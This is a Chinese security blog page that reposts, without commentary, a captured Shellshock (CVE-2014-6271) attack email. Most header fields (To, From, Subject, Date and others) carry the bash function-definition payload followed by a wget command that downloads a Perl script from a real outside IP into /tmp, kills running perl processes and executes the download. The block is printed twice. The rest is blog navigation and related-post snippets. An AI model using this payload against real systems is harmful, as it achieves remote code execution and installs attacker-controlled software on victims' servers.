- 浏览: 287730 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
来自:http://pastebin.com/Qbgn09Wa
邮件:
===
To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Cc:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Subject:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Date:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Message-ID:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Comments:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Keywords:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Date:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Sender:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
邮件:
引用
===
To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Cc:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Subject:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Date:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Message-ID:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Comments:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Keywords:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Date:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Sender:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
发表评论
-
linux 安装scrapy
2015-09-07 13:06 601由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 417based on our case, we need to h ... -
wpscan
2015-08-01 10:39 435https://www.digitalocean.com/co ... -
arachni-web-ui使用
2015-06-10 01:04 2146最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 341http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 338解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 452原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 429http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 581原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 436https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1592https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 670参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4126原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 849原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 643http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1972原文地址:http://josipfranjkovic.blo ... -
linux install firefix&plugin
2015-01-22 20:56 4541. download firefox&plugins ... -
Sinatra--超级轻量级web框架
2015-01-17 00:30 659Sinatra是一个超轻量级web框架 介绍:http://w ... -
使用Tesseract 识别验证码
2014-12-10 00:48 794参考: http://code.google.com/p/te ...
相关推荐
3. **攻击示例与复现**:实验中提供的源码将展示如何构造恶意输入来触发ShellShock漏洞。你可以通过修改环境变量,观察系统行为的变化,理解攻击是如何发生的。 4. **防御措施**:学习如何防御ShellShock攻击至关...
shellshock-shell 针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell 的漏洞利用。 使用它来利用已知的易受攻击的 URL。 此工具只能在您自己的授权 URL 上使用。... 示例:./shellshock.py -u
shellshock-cgi 一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本 用法 $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 ##示例返回: [+] Testing if 172.16....
ShellShock-CGI-扫描 用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) ...
破壳漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...
"shellshocker-master"很可能是一个包含关于Shellshocker漏洞分析、修复方法或者测试示例的项目仓库。通常,这样的仓库可能包括源代码、说明文档、PoC(Proof of Concept)测试脚本、安全更新的补丁等内容。开发者或...
以上仅为部分漏洞及其利用方法的示例,每个漏洞的具体实现细节和危害程度会有所不同。针对这些漏洞,开发者应当采取以下措施进行防御: - **输入验证**:对于所有用户提交的数据,都需要进行严格的验证和过滤,确保...
如果"lsh-master"是一个实际的项目,进一步了解其内容可以提供更具体的编程示例和应用。例如,它可能包含各种实用的Shell脚本模板,用于文件管理、系统监控、备份策略等常见任务。学习和理解这样的项目可以帮助提升...
除了理论知识,这本教程可能还包含了一些实践性的练习,比如编写简单的溢出示例,使用调试工具(如GDB)来观察溢出过程,甚至可能涉及到逆向工程的基本概念,以帮助读者从实践角度理解缓冲区溢出。 总的来说,《Q版...
- **真实世界示例**:通过分析历史上著名的安全漏洞(如Heartbleed、Shellshock等),深入理解错误的根源及其防范措施。 - **攻击模拟**:模拟常见的攻击手段(如SQL注入、XSS跨站脚本攻击等),教会读者如何识别和...
PDF格式则意味着这些内容是静态的,便于阅读和打印,同时可能包含了丰富的文字、图表和示例。 【描述】:“漏洞方法幻灯片 PDF幻灯片 此回购完全包含有关狩猎和黑客xD方法的材料:)” 描述中提到的“狩猎”通常指...
3. **案例研究**:详细描述了真实世界中发生的著名安全事件,如Heartbleed、Shellshock等,分析其影响和应对措施。 4. **工具和代码**:可能包含用于漏洞检测、安全审计的开源工具源码,以及利用或防御漏洞的示例...